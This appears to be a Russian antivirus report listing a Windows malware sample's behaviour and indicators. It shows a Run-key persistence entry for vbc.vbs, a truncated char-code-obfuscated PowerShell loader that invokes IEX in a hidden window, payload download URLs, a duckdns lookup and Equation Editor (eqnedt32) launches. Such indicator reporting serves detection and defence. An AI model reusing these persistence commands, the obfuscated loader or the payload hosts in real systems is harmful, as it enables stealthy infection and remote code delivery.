Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%APPDATA%\vbc.vbs '
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\vbc.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\vbc.vbs '
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [char]73;$a2=[char]69;$a3=[char]88;sal K $a$a2$a3;$hddgdgd6635e5664646464jgjgh=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,10...
- %WINDIR%\syswow64\calc.exe
- %APPDATA%\vbc.vbs
- %APPDATA%\logsm.dat
- %APPDATA%\logsm.dat
- http://gg.gg/gq58c
- http://th####edycenter.com/nova/nova.vbs
- http://th####edycenter.com/nova2/Attack.jpg
- DNS ASK gg.gg
- DNS ASK th####edycenter.com
- DNS ASK re####.duckdns.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [char]73;$a2=[char]69;$a3=[char]88;sal K $a$a2$a3;$hddgdgd6635e5664646464jgjgh=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,10...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\vbc.vbs '' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\calc.exe'